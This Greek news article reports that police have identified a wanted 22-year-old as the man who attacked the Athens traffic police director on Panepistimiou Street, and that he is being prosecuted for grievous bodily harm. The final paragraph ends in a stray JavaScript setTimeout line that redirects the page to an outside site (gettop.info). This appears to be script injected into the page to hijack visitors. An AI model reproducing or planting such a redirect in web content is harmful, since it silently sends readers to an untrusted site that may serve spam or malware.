Ένας 22χρονος πίσω από την επίθεση στον διευθυντή Τροχαίας

0
6

 

Εξιχνιάστηκε η υπόθεση της επίθεσης εναντίον του διευθυντή της Τροχαίας Γιώργου Διαμαντίπουλου στο κέντρο της Αθήνας στις  29 Αυγούστου και σύμφωνα με την αστυνομία πρόκειται για έναν 22χρονο ο οποίος αναζητείται.

Κατά το παρελθόν ο νεαρός είχε συλληφθεί και κατηγορηθεί για αδικήματα που αφορούσαν μεταξύ άλλων και συμμετοχή σε εγκληματική οργάνωση. Για τα αδικήματα αυτά του έχουν επιβληθεί περιοριστικοί όροι, τους οποίους παραβίασε στις 10 Σεπτεμβρίου 2016 και έκτοτε αναζητείται.

Ο 22χρονος το βράδυ της επίθεσης, μετά τη λήξη πορείας σε κεντρικούς δρόμους της Αθήνας, πλησίασε από πίσω, στην οδό Πανεπιστημίου, τον διευθυντή της Τροχαίας Αθηνών, ο οποίος εκτελούσε διατεταγμένη υπηρεσία και του επιτέθηκε αναίτια και αιφνιδιαστικά, καταφέροντάς του χτυπήματα στο κεφάλι, με αποτέλεσμα τον τραυματισμό του.

Σε βάρος του δράστη σχηματίστηκε  δικογραφία για το αδίκημα της βαριάς σωματικής βλάβης σε βάρος αστυνομικού. Η δικογραφία υποβλήθηκε στον εισαγγελέα Πλημμελειοδικών Αθηνών, ο οποίος άσκησε ποινική δίωξη και παρέπεμψε την υπόθεση σε τακτική ανάκριση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here